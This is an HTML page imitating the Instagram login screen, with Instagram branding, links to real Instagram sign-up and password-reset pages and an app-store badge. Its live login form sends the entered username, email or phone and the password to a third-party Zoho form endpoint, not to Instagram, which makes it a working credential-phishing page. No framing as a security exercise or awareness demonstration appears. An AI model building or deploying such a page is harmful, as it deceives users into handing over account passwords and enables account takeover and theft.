<!DOCTYPE html>
<html>

<head>
    <link href='https://fonts.googleapis.com/css?family=Lobster Two' rel='stylesheet'>
    <style>
        .login {
            margin-left: 800px;
            border: 3px solid whitesmoke;
            width: 250px;
            margin-top: -450px;
            padding: 30px;
           


        }

        #account {
            margin-top: -10px;
            margin-left: 50px;
            font-family: 'Lobster Two';
            font-size: 30px;
            width: 700px;
            font-weight: 700;
        }

        .ip1 {
            padding: 10px;
            width: 200px;
            margin-left: 10px;


        }

        img {
            width: 400px;
            height: 450px;
            margin-left: 250px;
        }

        .ip2 {
            background-color: #83b4ff;
            font-weight: 900;
            width: 220px;
            color: #fff;
            border-radius: 5px;
            border: none;
            margin-top: 20px;
            padding: 13px;
            margin-left:10px;



        }

        .field {
            margin-left: 100px;
            border: none;
        }

        .hef {
            margin-left: 20px;
            margin-top: -10px;
        }

        .gef {
            margin-top: -10px;
            margin-left: -100px;
            width: 98px;

        }

        a {
            text-decoration: none;
            font-size: 15px;
            color: darkblue;
        }

        .facebook {
            margin-left: 60px;
            color: darkblue;
        }

        .forgot {
            color: darkblue;
            margin-left: 40px;
            padding: 25px;
            display: inline;
            margin-top: 50px;
        }

        .form {
            margin-top: -40px;
        }

        .form1 {
            border:3px solid whitesmoke;
            margin-left: 800px;
            width: 270px;
            padding: 20px;
            margin-top: 20px;
           




        }

        b {
            color: darkblue;
        }

        #acc {
            display: inline;

        }

        .def {
            margin-left: 900px;
        }

        .cef {
            height: 60px;
            width: 100px;
            margin-left: 830px;

        }

        .micro {
            height: 50px;
            width: 100px;
            margin-left: 20px;
            margin-top: 30px;
        }

        
    </style>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css"
        integrity="sha512-SnH5WK+bZxgPHs44uWIX+LLJAJ9/2PkPKZ5QiAj6Ta86w+fsb2TkcmfRyVX3pBnMFcV7oQPJkl9QevSCWr3W6A=="
        crossorigin="anonymous" referrerpolicy="no-referrer" />
</head>

<body>
    <img src="insta.jpg">
    <div class="login">
    <!-- Change or deletion of the name attributes in the input tag will lead to empty values on record submission-->
<form action='https://forms.zohopublic.in/kakiletiangel/form/Instagram/formperma/tRoaUjIn0ME5VLm75BnPgF3x272-nMcYDZJRZg2NlJI/htmlRecords/submit' name='form' id='form' method='POST' accept-charset='UTF-8' enctype='multipart/form-data'>
    <input type="hidden" name="zf_referrer_name" value=""><!-- To Track referrals , place the referrer name within the " " in the above hidden input field -->
    <input type="hidden" name="zf_redirect_url" value=""><!-- To redirect to a specific page after record submission , place the respective url within the " " in the above hidden input field -->
    <input type="hidden" name="zc_gad" value=""><!-- If GCLID is enabled in Zoho CRM Integration, click details of AdWords Ads will be pushed to Zoho CRM -->
    <h2 id="account">Instagram</h2>
    <p></p>
    <!--Single Line-->
    
    <input class="ip1"  type="text" name="SingleLine" value="" fieldType=1 maxlength="255" placeholder="email/phone number/user name" />
    <!--Single Line--><br><br>
    
    <input class="ip1" type="text" name="SingleLine1" value="" fieldType=1 maxlength="255" placeholder="password" />
    <button class="ip2" type="submit"><em>Log in</em></button></form>
</div>

     <!-- <div class="login">
        <form>
            <p id="account">Instagram</p><br><br>
            <div class="form">
                <div class="ip">
                    <input type="text" placeholder="email/phone number/user name" class="ip1"
                        pattern="[0-9][a-z][@,#,&,*]">
                    <br><br>
                    <input type="password" placeholder="password" class="ip1"><br><br> -->
                    <!-- <button type="submit" class="ip2"><em>Log in</em></button>

                </div>

                <fieldset class="field">
                    <hr class="hef">
                    <legend>or</legend>
                    <hr class="gef">
                </fieldset>
                <div class="facebook"><i class="fa-brands fa-square-facebook"></i>&nbsp;<a
                        href="https://www.facebook.com/login.php?skip_api_login=1&api_key=124024574287414&kid_directed_site=0&app_id=124024574287414&signed_next=1&next=https%3A%2F%2Fwww.facebook.com%2Fdialog%2Foauth%3Fclient_id%3D124024574287414%26locale%3Den_GB%26redirect_uri%3Dhttps%253A%252F%252Fwww.instagram.com%252Faccounts%252Fsignup%252F%26response_type%3Dcode%252Cgranted_scopes%26scope%3Demail%26state%3D%257B%2522fbLoginKey%2522%253A%2522ht1lpm1cwunbot6e9jh1pwjcxjaglckk1nwckz6eq7zwz102uk1y%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%253Fnext%253Dhttps%25253A%25252F%25252Fwww.instagram.com%25252Faccounts%25252Fedit%25252F%25253F__coig_login%25253D1%2522%257D%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3D87df70c2-79e1-41cf-ad47-6f326e9151e1%26tp%3Dunspecified&cancel_url=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%26state%3D%257B%2522fbLoginKey%2522%253A%2522ht1lpm1cwunbot6e9jh1pwjcxjaglckk1nwckz6eq7zwz102uk1y%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%253Fnext%253Dhttps%25253A%25252F%25252Fwww.instagram.com%25252Faccounts%25252Fedit%25252F%25253F__coig_login%25253D1%2522%257D%23_%3D_&display=page&locale=en_GB&pl_dbl=0"><b>Log
                            in with Facebook<br><br></b></a></div>
                <a class="forgot"
                    href="https://www.instagram.com/accounts/password/reset/?next=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fedit%2F%3F__coig_login%3D1">Forgotten
                    your password?</a>
            </div>
        </form> -->
    </div> 
    <div class="form1">
        <p id="acc">Don't have an account?<a href="https://www.instagram.com/accounts/emailsignup/?hl=en"><b>Sign
                    up</b></a>
    </div>
    <p class="def">Get the app</p>
    <a href="https://play.google.com/store/apps/details?id=com.instagram.android&hl=en_IN&pli=1"><img class="cef"
            src="https://www.codot.gov/safety/impaired-driving/planahead/2011-assets/android-market-icon.png/@@images/image"></a>
    <a href=""><img class="micro" src="mic.webp"></a>
</body>

</body>

</html>